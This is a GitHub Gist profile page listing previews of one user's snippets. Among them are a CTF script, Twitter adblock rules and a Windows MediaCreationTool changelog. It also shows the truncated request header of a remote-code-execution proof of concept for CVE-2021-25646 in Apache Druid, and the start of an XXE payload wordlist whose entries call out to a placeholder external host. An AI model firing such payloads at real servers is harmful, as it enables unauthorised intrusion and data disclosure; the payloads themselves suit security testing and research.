Skip to content

Instantly share code, notes, and snippets.

View h4fan's full-sized avatar
🐒
banana

h4fan

🐒
banana
27 followers · 34 following
View GitHub Profile
@h4fan
h4fan / ctf.js
Created September 2, 2021 09:02
ctf
var p = [];
p[0] = 52037 ;
p[6] = 52081 ;
p[5] = 52063 ;
p[1] = 52077 ;
p[9] = 52077 ;
p[10] = 52080 ;
p[4] = 52046 ;
p[3] = 52066 ;
p[8] = 52085 ;
@h4fan
h4fan / cleantwitter.adblock
Created April 11, 2021 01:12
adblock plus rules which hide the first and the third column of twitter.com
twitter.com##.css-1dbjc4n.r-aqfbo4.r-zso239.r-1hycxz
twitter.com##.css-1dbjc4n.r-aqfbo4.r-1pi2tsx.r-1xcajam.r-ipm5af
@h4fan
h4fan / CVE-2021-25646 POC
Created February 3, 2021 09:40 — forked from 0xf4n9x/CVE-2021-25646 POC
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
@h4fan
h4fan / .. MediaCreationTool.bat .md
Created November 9, 2020 00:27 — forked from AveYo/.. MediaCreationTool.bat ..md
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 20H2 with business (Enterprise) edition support

Preview1 Preview2

2018.10.10: reinstated 1809 [RS5]! using native xml patching for products.xml; fixed syntax bug with exit/b
2018.10.12: added data loss warning for RS5
2018.11.13: RS5 is officially back! + greatly improved choices dialog - feel free to use the small snippet in your own scripts
2019.05.22: 1903 [19H1]
2019.07.11: 1903 __release_svc_refresh__ and enable DynamicUpdate by default to grab latest CU
2019.09.29: UPDATED 19H1 build 18362.356 ; RS5 build 17763.379 and show build number
@h4fan
h4fan / xxe-payloads.txt
Created September 14, 2020 11:25 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y